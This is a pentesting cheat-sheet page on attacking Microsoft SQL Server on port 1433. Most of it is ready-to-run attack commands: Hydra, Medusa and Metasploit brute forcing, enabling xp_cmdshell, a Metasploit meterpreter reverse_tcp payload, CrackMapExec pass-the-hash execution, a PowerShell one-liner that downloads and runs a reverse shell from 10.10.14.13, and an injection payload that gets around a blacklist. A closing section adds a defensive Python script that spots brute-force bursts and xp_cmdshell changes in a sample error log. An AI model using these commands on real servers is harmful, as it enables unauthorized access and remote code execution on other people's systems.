# MSSQL (Microsoft SQL Server) - Port 1433

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop**](https://shop.verylazytech.com/) for e-books and courses. 📚
{% endtab %}
{% endtabs %}

## Basic info

MSSQL is designed to store and retrieve data as requested by applications. Its features include:

* **Default Port**: TCP/1433 for standard communication.
* **Authentication Modes**:
  * Windows Authentication
  * Mixed Mode (Windows and SQL Server Authentication)
* **Common Uses**:
  * Data storage for web applications, enterprise systems, and reporting services.

While MSSQL provides robust security features, misconfigurations, weak authentication, and unpatched vulnerabilities can expose it to attacks.

***

### Banner Grabbing

Banner grabbing helps identify the MSSQL server version, authentication modes, and potential vulnerabilities.

**Tools and Commands:**

1. **Telnet** (basic connection test):

   ```
   telnet <IP> 1433
   ```
2. **Nmap**:

   ```
   nmap -sV -p 1433 --script ms-sql-info <IP>
   ```

   Example Output:

   ```
   1433/tcp open ms-sql-s Microsoft SQL Server 2019 RTM
   ```
3. **Metasploit Framework**:

   ```
   msfconsole
   use auxiliary/scanner/mssql/mssql_ping
   set RHOSTS <IP>
   run
   ```

***

## Authentication Bypass Techniques

### **Null Authentication**

If SQL Server is misconfigured, it may allow unauthenticated access:

1. **Testing Null Authentication**:

   ```
   sqsh -S <IP> -U "" -P ""
   ```

### MSSQL Brute Force Attacks

Brute force attacks can help identify weak or default credentials.

1. **Hydra**:

   ```
   hydra -L usernames.txt -P passwords.txt mssql://<IP>
   ```
2. **Medusa**:

   ```
   medusa -h <IP> -u <username> -P passwords.txt -M mssql
   ```
3. **Metasploit Auxiliary Module**:

   ```
   msfconsole
   use auxiliary/scanner/mssql/mssql_login
   set RHOSTS <IP>
   set USER_FILE usernames.txt
   set PASS_FILE passwords.txt
   run
   ```

***

## MSSQL Enumeration

**Key Enumeration Techniques:**

1. **Identify Databases**:

   ```
   SELECT name FROM sys.databases;
   ```
2. **List Users**:

   ```
   SELECT name FROM sys.syslogins;
   ```
3. **Server Information**:

   ```
   SELECT @@version;
   ```
4. **Extract Privileges**:

   ```
   SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
   ```

**Automated Enumeration:**

* **Metasploit**:

  ```
  use auxiliary/admin/mssql/mssql_enum
  set RHOSTS <IP>
  run
  ```

***

## Exploitation Techniques

**Command Execution via xp\_cmdshell**

`xp_cmdshell` allows executing OS commands from SQL Server.

1. **Enable xp\_cmdshell**:

   ```
   EXEC sp_configure 'show advanced options', 1;
   RECONFIGURE;
   EXEC sp_configure 'xp_cmdshell', 1;
   RECONFIGURE;
   ```
2. **Execute Commands**:

   ```
   EXEC xp_cmdshell 'whoami';
   ```

## **Privilege Escalation**

Use known vulnerabilities or misconfigurations to escalate privileges:

1. **CVE-2020-0618** (SQL Reporting Services RCE): Exploit unpatched SQL Reporting Services.
2. **Metasploit Module for Privilege Escalation**:

   ```
   use exploit/windows/mssql/mssql_payload
   set RHOST <IP>
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST <your_IP>
   run
   ```

***

## Execute OS Commands

Note that in order to execute commands it is not enough to have **`xp_cmdshell`** **enabled**; the login also needs the **EXECUTE permission on the `xp_cmdshell` stored procedure** (members of `sysadmin` have it implicitly). You can list who, other than sysadmins, has been granted **`xp_cmdshell`** with:

```
-- List explicit permissions on xp_cmdshell (sysadmins are not shown)
USE master
EXEC sp_helprotect 'xp_cmdshell'
```

Authenticated command execution through CrackMapExec (password or NTLM hash):

```
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
```

Checking and enabling `xp_cmdshell` from a SQL session:

```
-- Check if xp_cmdshell is enabled (value_in_use = 1 means enabled)
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

-- Turn on advanced options; required before xp_cmdshell can be configured
sp_configure 'show advanced options', '1'
RECONFIGURE
-- Enable xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

-- One-liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
-- Get reverse shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

-- Bypass a blacklisted "EXEC xp_cmdshell" string by calling the procedure through a variable
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' --
```
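Both the brute-force section above and the `xp_cmdshell` enablement steps leave traces in the SQL Server ERRORLOG: each failed login is written as error 18456 followed by a `Login failed for user ... [CLIENT: ip]` line, and `sp_configure` writes `Configuration option 'xp_cmdshell' changed from 0 to 1`. The following script is an added example written for this page, not VeryLazyTech's code and not part of the original post; it parses a constructed ERRORLOG excerpt (sample data, not from a real server), flags clients whose failed logins cluster inside a sliding window, and reports every point at which `xp_cmdshell` was switched on. The message formats are those SQL Server writes to its error log; the threshold and window size are assumptions you would tune to your environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample ERRORLOG excerpt (not captured from a real server).
# Layout mirrors the SQL Server error log: timestamp, source column, message.
SAMPLE_ERRORLOG = """\
2024-05-01 10:00:01.10 Logon       Error: 18456, Severity: 14, State: 8.
2024-05-01 10:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:00:01.35 Logon       Error: 18456, Severity: 14, State: 8.
2024-05-01 10:00:01.35 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:00:01.60 Logon       Error: 18456, Severity: 14, State: 8.
2024-05-01 10:00:01.60 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:00:01.85 Logon       Error: 18456, Severity: 14, State: 8.
2024-05-01 10:00:01.85 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:00:02.10 Logon       Error: 18456, Severity: 14, State: 8.
2024-05-01 10:00:02.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:00:02.40 Logon       Error: 18456, Severity: 14, State: 8.
2024-05-01 10:00:02.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:03:12.00 Logon       Error: 18456, Severity: 14, State: 5.
2024-05-01 10:03:12.00 Logon       Login failed for user 'appuser'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.7]
2024-05-01 10:05:00.00 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 10:05:00.50 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

# One ERRORLOG line: "<timestamp> <source> <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) (?P<src>\S+)\s+(?P<msg>.*)$"
)
# Second line of an 18456 pair carries the login name and client address
FAILED_RE = re.compile(r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
# Written by sp_configure when a server option changes
CONFIG_RE = re.compile(r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")


def parse_errorlog(text):
    """Turn raw ERRORLOG text into (timestamp, source, message) tuples, skipping unparseable lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m.group("src"), m.group("msg")))
    return events


def failed_logins(events):
    """Yield (timestamp, user, client) for every 'Login failed' message."""
    for ts, _src, msg in events:
        m = FAILED_RE.search(msg)
        if m:
            yield ts, m.group("user"), m.group("client")


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=1)):
    """Return {client: peak failures inside any `window`} for clients at or above `threshold`.

    Sliding-window count per client, so a slow trickle spread over hours is not flagged
    while a burst of Hydra/Medusa attempts is. Threshold and window are assumed values.
    """
    per_client = defaultdict(list)
    for ts, _user, client in failed_logins(events):
        per_client[client].append(ts)
    flagged = {}
    for client, stamps in per_client.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # drop failures that fell out of the window
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[client] = peak
    return flagged


def detect_xp_cmdshell_enabled(events):
    """Return [(timestamp, source)] for every change of 'xp_cmdshell' to 1."""
    hits = []
    for ts, src, msg in events:
        m = CONFIG_RE.search(msg)
        if m and m.group("opt") == "xp_cmdshell" and m.group("new") == "1":
            hits.append((ts, src))
    return hits


if __name__ == "__main__":
    evts = parse_errorlog(SAMPLE_ERRORLOG)
    for client, peak in detect_bruteforce(evts).items():
        print(f"possible brute force from {client}: {peak} failed logins within one minute")
    for ts, src in detect_xp_cmdshell_enabled(evts):
        print(f"xp_cmdshell enabled at {ts} by {src}; check who ran sp_configure")
```

Point `parse_errorlog` at the contents of the live ERRORLOG (or a `sp_readerrorlog` export) to run it against real data. The `spid` in the source column identifies the session that changed the option, which you can correlate with `sys.dm_exec_sessions` or a login audit to find the principal responsible; a change to `1` that was not made by a known administrator is a strong indicator that the steps above were run by an intruder.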

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)

{% endhint %}
